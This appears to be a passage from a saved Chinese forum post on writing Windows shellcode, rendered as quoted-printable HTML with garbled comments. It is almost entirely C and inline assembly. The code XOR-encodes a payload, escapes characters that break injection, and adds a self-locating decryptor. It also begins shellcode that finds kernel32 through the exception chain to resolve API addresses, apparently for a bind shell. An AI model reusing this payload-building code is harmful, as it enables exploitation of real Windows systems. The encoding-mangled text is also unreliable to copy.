关于windows下shellcode编写的一点思考.mht

精华BBS贴子

                        break;<BR>&nbsp;&nbsp;if (k&lt;MAX_Enc_Len)=20
                        pSc_addr+=3D(k+8);&nbsp;=20
                        =
&nbsp;//=C8=E7=D5=D2=B5=BD=B6=A8=CE=BB=CA=B5=BC=CA=B4=FA=C2=EB=B5=C4=BF=AA=
=CA=BC<BR>&nbsp;&nbsp;*/<BR><BR>&nbsp;&nbsp;//=D5=D2=B5=BDshellcode=B5=C4=
=BD=E1=CE=B2=BC=B0=B3=A4=B6=C8<BR>&nbsp;&nbsp;for(k=3D0;k&lt;MAX_Sc_Len;+=
+k)=20
                        =
if(memcmp(pSc_addr+k,fnend_str,ENDSTRLEN)=3D=3D0)=20
                        break;<BR>&nbsp;&nbsp;if (k&lt;MAX_Sc_Len)=20
                        Sc_len=3Dk;<BR>&nbsp;&nbsp;else=20
                        <BR>&nbsp;&nbsp;{<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;k=3D0;<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;printf("\nNo End=20
                        str defined in ShellCodes function!Please=20
                        Check....\n");<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;return=20
                        =
0;<BR>&nbsp;&nbsp;}<BR><BR><BR>&nbsp;&nbsp;//=B0=D1shellcode=B4=FA=C2=EB=B8=
=B4=D6=C6=BD=F8sc_buff<BR>&nbsp;&nbsp;memcpy(sc_buff,pSc_addr,Sc_len);<BR=
><BR>&nbsp;&nbsp;//=B0=D1=D7=D6=B7=FB=B4=AE=BF=BD=B1=B4=D4=DAshellcode=B5=
=C4=BD=E1=CE=B2<BR>&nbsp;&nbsp;for(i=3D0;i&lt;MAX_api_strlen;++i)=20
                        =
if(memcmp(ApiStr+i,"strend",API_endstrlen)=3D=3D0)=20
                        =
break;<BR>&nbsp;&nbsp;if(i&gt;=3DMAX_api_strlen)<BR>&nbsp;&nbsp;{<BR>&nbs=
p;=20
                        &nbsp;&nbsp; &nbsp;printf("\nNo End str defined =
in API=20
                        strings!Please Check....\n");<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;return=20
                        =
0;<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;memcpy(sc_buff+k,ApiStr,i);<BR><BR>&nb=
sp;&nbsp;Sc_len+=3Di;&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//=D4=F6=BC=D3shellcode=B5=C4=B3=A4=B6=C8<BR><BR>&nbsp;=
&nbsp;//<BR>&nbsp;&nbsp;//=B6=D4shellcode=BD=F8=D0=D0=B1=E0=C2=EB=CB=E3=B7=
=A8=BC=F2=B5=A5=A3=AC=BF=C9=B8=F9=BE=DD=D0=E8=D2=AA=B8=C4=B1=E4<BR>&nbsp;=
&nbsp;//<BR>&nbsp;&nbsp;k=3DEncCode_len+nop_LEN;&nbsp;=20
                        &nbsp;=20
                        =
//=B6=A8=CE=BB=BB=BA=B3=E5=C7=F8=D3=A6=B4=E6=B7=C5ShellCode=B5=D8=D6=B7=B5=
=C4=BF=AA=CA=BC<BR><BR>&nbsp;&nbsp;for(i=3D0;i&lt;Sc_len;++i){<BR><BR>&nb=
sp;=20
                        =
&nbsp;&nbsp;&nbsp;ch=3Dsc_buff[i]^Enc_key;<BR>&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//=B6=D4=D2=BB=D0=A9=BF=C9=C4=DC=D4=EC=B3=C9shellcode=CA=
=A7=D0=A7=B5=C4=D7=D6=B7=FB=BD=F8=D0=D0=CC=E6=BB=BB<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;if(ch&lt;=3D0x1f||ch=3D=3D'=20
                        =
'||ch=3D=3D'.'||ch=3D=3D'/'||ch=3D=3D'\\'||ch=3D=3D'0'||ch=3D=3D'?'||ch=3D=
=3D'%'||ch=3D=3D'+')<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;{<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;buff[k]=3D'0';<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;++k;<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;ch+=3D0x31;<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;}<BR>&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//=B0=D1=B1=E0=C2=EB=B9=FD=B5=C4shellcode=B7=C5=D4=DADe=
cryptSc=B4=FA=C2=EB=BA=F3=C3=E6<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;buff[k]=3Dch;<BR>&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;++k;<BR>&nbsp;&nbsp;}<BR><BR>&nbsp;&nbsp;//shellcode=B5=
=C4=D7=DC=B3=A4=B6=C8<BR>&nbsp;&nbsp;buff_len=3Dk;<BR><BR>&nbsp;&nbsp;//=B4=
=F2=D3=A1=B3=F6shellcode<BR>&nbsp;&nbsp;PrintSc(buff,buff_len);<BR>&nbsp;=
&nbsp;//buff[buff_len]=3D0;<BR>&nbsp;&nbsp;//printf("%s",buff);<BR><BR>#i=
fdef=20
                        DEBUG<BR>&nbsp;&nbsp;_asm{<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;lea eax,buff<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;jmp=20
                        eax<BR>&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;ret<BR>&nbsp;&nbsp;}<BR>#endif<BR><BR>&nbsp;=20
                        &nbsp;=20
                        =
return&nbsp;&nbsp;0;<BR>}<BR><BR>//=BD=E2=C2=EBshellcode=B5=C4=B4=FA=C2=EB=
<BR>void&nbsp;&nbsp;DecryptSc()<BR>{<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;=20
                        =
__asm{<BR><BR>/////////////////////////<BR>//=B6=A8=D2=E5=BF=AA=CA=BC=B1=EA=
=D6=BE<BR>/////////////////////////<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; =
PROC_BEGIN&nbsp; &nbsp;=20
                        //C macro to begin proc<BR><BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp; jmp&nbsp;=20
                        &nbsp;next<BR>getEncCodeAddr:<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp; pop&nbsp; =
&nbsp;edi<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;=20
                        push&nbsp;&nbsp;edi<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp; pop&nbsp; &nbsp;esi<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp; xor&nbsp;=20
                        &nbsp;ecx,ecx<BR>Decrypt_lop: <BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp; lodsb<BR>&nbsp; &nbsp;&nbsp; =

                        &nbsp;&nbsp; &nbsp; =
cmp&nbsp;&nbsp;al,cl<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; jz&nbsp;=20
                        &nbsp;shell<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;=20
                        =
cmp&nbsp;&nbsp;al,0x30&nbsp;&nbsp;//=C5=D0=B6=CF=CA=C7=B7=F1=CE=AA=CC=D8=CA=
=E2=D7=D6=B7=FB<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; jz&nbsp;=20
                        &nbsp;special_char_clean<BR>store:&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;=20
                        xor&nbsp;&nbsp;al,Enc_key<BR>&nbsp; &nbsp;&nbsp; =

                        &nbsp;&nbsp; &nbsp; stosb<BR>&nbsp; &nbsp;&nbsp; =

                        &nbsp;&nbsp; &nbsp;=20
                        =
jmp&nbsp;&nbsp;Decrypt_lop<BR>special_char_clean:&nbsp;=20
                        &nbsp;<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;=20
                        lodsb<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; =
sub=20
                        al,0x31<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp; jmp=20
                        store<BR>next:&nbsp; =
&nbsp;&nbsp;&nbsp;<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;=20
                        call&nbsp;&nbsp;getEncCodeAddr<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;=20
                        =
//=C6=E4=D3=E0=D5=E6=D5=FD=BC=D3=C3=DC=B5=C4shellcode=B4=FA=C2=EB=BB=E1=C1=
=AC=BD=D3=D4=DA=B4=CB=B4=A6<BR>shell:&nbsp; &nbsp;=20
                        =
<BR><BR>/////////////////////////<BR>//=B6=A8=D2=E5=BD=E1=CA=F8=B1=EA=D6=BE=
<BR>/////////////////////////<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; PROC_END&nbsp;=20
                        &nbsp;&nbsp; &nbsp;//C macro to end =
proc<BR><BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; }<BR>}&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;<BR><BR>//<BR>//shellcode=B4=FA=C2=EB<BR>//<BR>void=20
                        ShellCodes()<BR>{<BR>&nbsp; &nbsp; =
//API=B5=CD=D6=B7=CA=FD=D7=E9&nbsp;=20
                        &nbsp; <BR>&nbsp; &nbsp; FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;API[API_num];<BR><BR><BR>&nbsp; &nbsp;=20
                        =
//=D7=D4=BC=BA=BB=F1=C8=A1=B5=C4API=B5=D8=D6=B7<BR>&nbsp; &nbsp; =
FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;GetProcAddr;<BR>&nbsp; &nbsp;=20
                        FARPROC&nbsp; &nbsp; LoadLib;<BR><BR>&nbsp; =
&nbsp;=20
                        HANDLE&nbsp; &nbsp;&nbsp; =
&nbsp;hKrnl32;<BR>&nbsp;=20
                        &nbsp; HANDLE&nbsp; &nbsp;&nbsp;=20
                        &nbsp;libhandle;<BR><BR>&nbsp; &nbsp; char&nbsp; =

                        &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;*ApiStr_addr,*p;<BR>&nbsp; =
&nbsp;=20
                        <BR>&nbsp; &nbsp; int&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;k;<BR>&nbsp; &nbsp; u_short&nbsp;=20
                        &nbsp;&nbsp;&nbsp;shellcodeport;<BR><BR>&nbsp; =
&nbsp;=20
                        //=B2=E2=CA=D4=D3=C3=B1=E4=C1=BF<BR>&nbsp; =
&nbsp; char&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;*testAddr;<BR><BR>/*<BR>&nbsp; =
&nbsp;=20
                        STARTUPINFO siinfo;<BR>&nbsp; &nbsp; =
SOCKET&nbsp;=20
                        &nbsp;&nbsp; &nbsp;listenFD,clientFD;<BR>&nbsp; =
&nbsp;=20
                        struct&nbsp; &nbsp;&nbsp; &nbsp;sockaddr_in=20
                        server;<BR>&nbsp; &nbsp; int&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;iAddrSize =3D =
sizeof(server);<BR>&nbsp;=20
                        &nbsp; int&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;lBytesRead;<BR>&nbsp; &nbsp; =
PROCESS_INFORMATION=20
                        ProcessInformation;<BR>&nbsp; &nbsp; =
HANDLE&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;<BR>&nbsp;=20
                        &nbsp; SECURITY_ATTRIBUTES =
sa;<BR><BR>*/<BR><BR><BR>_asm=20
                        {<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;jmp&nbsp;=20
                        &nbsp; locate_addr0<BR>getApiStr_addr:<BR>&nbsp; =

                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;pop&nbsp; &nbsp;=20
                        ApiStr_addr<BR><BR>&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//=BF=AA=CA=BC=BB=F1=C8=A1API=B5=C4=B5=D8=D6=B7=D2=D4=BC=
=B0GetProcAddress=BA=CDLoadLibraryA=B5=C4=B5=D8=D6=B7<BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//=D2=D4=BA=F3=BE=CD=BF=C9=D2=D4=B7=BD=B1=E3=B5=D8=BB=F1=
=C8=A1=C8=CE=BA=CEAPI=B5=C4=B5=D8=D6=B7=C1=CB<BR><BR>&nbsp;=20
                        &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;//=B1=A3=BB=A4=BC=C4=B4=E6=C6=F7<BR>&nbsp;=20
                        &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;pushad<BR><BR>&nbsp;=20
                        &nbsp; xor&nbsp; =
&nbsp;&nbsp;&nbsp;esi,esi<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;lods&nbsp; &nbsp; =
dword=20
                        ptr fs:[esi]<BR>&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;<BR>Search_Krnl32_lop:<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;inc&nbsp;=20
                        &nbsp;&nbsp;&nbsp;eax<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;je&nbsp; &nbsp;&nbsp;=20
                        &nbsp;Krnl32_Base_Ok<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;dec&nbsp;=20
                        &nbsp;&nbsp;&nbsp;eax<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;xchg&nbsp; &nbsp; =
esi,eax<BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;LODSD&nbsp;&nbsp;<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;jmp&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;Search_Krnl32_lop<BR>Krnl32_Base_Ok:<BR><BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;LODSD&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp; <BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;;compare if=20
                        PE_hdr<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;xchg&nbsp; &nbsp; =
esi,eax<BR>&nbsp;=20
                        &nbsp; find_pe_header:<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;dec&nbsp;=20
                        &nbsp;&nbsp;&nbsp;esi<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;xor&nbsp;=20
                        &nbsp;&nbsp;&nbsp;si,si&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;;kernel32 is 64kb =
align<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;mov&nbsp;=20
                        &nbsp;&nbsp;&nbsp;eax,[esi]<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;add&nbsp;=20
                        &nbsp;&nbsp;&nbsp;ax,-'ZM'&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;;&nbsp; &nbsp;&nbsp; &nbsp; =
<BR>&nbsp;=20